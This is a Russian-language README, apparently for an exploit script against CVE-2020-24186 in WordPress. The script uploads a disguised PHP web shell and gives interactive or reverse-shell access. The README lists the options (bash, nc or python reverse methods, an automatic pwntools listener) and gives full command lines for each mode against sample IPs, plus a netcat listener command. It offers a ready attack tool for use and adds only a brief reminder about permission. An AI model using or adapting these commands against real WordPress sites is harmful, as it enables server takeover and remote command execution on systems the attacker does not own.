
Эксплойт-скрипт для CVE-2020-24186 в WordPress, который загружает замаскированную PHP веб-шелл и предоставляет интерактивный или реверсивный доступ к оболочке с опциональной автоматизацией слушателя pwntools.
Этот скрипт эксплуатирует уязвимость CVE-2020-24186 в WordPress для загрузки замаскированной PHP-нагрузки и получения оболочки на целевой системе. Существует три режима работы:
Интерактивная оболочка:
Загружает базовую веб-оболочку и переходит в интерактивный режим, позволяя отправлять команды через параметр cmd.
Ручная обратная оболочка:
Загружает веб-оболочку и отправляет нагрузку обратной оболочки, но не запускает прослушиватель автоматически. Вы должны вручную запустить свой собственный прослушиватель на указанном IP и порту.
Обратная оболочка с pwntools:
Загружает веб-оболочку, отправляет нагрузку обратной оболочки, и скрипт автоматически запускает прослушиватель с помощью pwntools для захвата обратного соединения.
requestspwn (pwntools)--url: Базовый URL целевого сайта (например, http://10.10.110.119).--blogpath: Путь к публикации (по умолчанию: /?page=1).--mode: Режим работы: interactive или reverse.--lhost: Локальный IP для обратной оболочки (обязательно в режиме reverse).--lport: Локальный порт для обратной оболочки (обязательно в режиме reverse).--reverse_method: Метод обратной оболочки: bash, nc или python (по умолчанию bash).--manual: При использовании в режиме reverse скрипт не будет запускать прослушиватель; вы должны вручную запустить свой собственный прослушиватель.--use-proxy: Если установлен, запросы будут отправляться через настроенный прокси.Загрузить веб-оболочку и начать интерактивный сеанс для отправки команд:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Загрузить веб-оболочку, отправить нагрузку обратной оболочки, но не запускать прослушиватель автоматически. Запустите свой собственный прослушиватель вручную (например, с помощью netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Затем в другом терминале запустите прослушиватель вручную:
nc -lvnp 9002
Загрузите веб-оболочку, отправьте нагрузку обратной оболочки, и скрипт автоматически запустит прослушиватель с помощью pwntools для захвата соединения:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
Скрипт будет ожидать соединение на 10.10.1.1:9002 и, когда соединение установлено, предоставит интерактивную оболочку.
Примечания
Убедитесь, что целевой сайт уязвим к CVE-2020-24186 и что у вас есть необходимые разрешения для тестирования безопасности.
Вы можете изменить PHP-нагрузку с помощью опции --php_payload, если требуются корректировки.
Дважды проверьте настройки прокси, если вы используете флаг --use-proxy.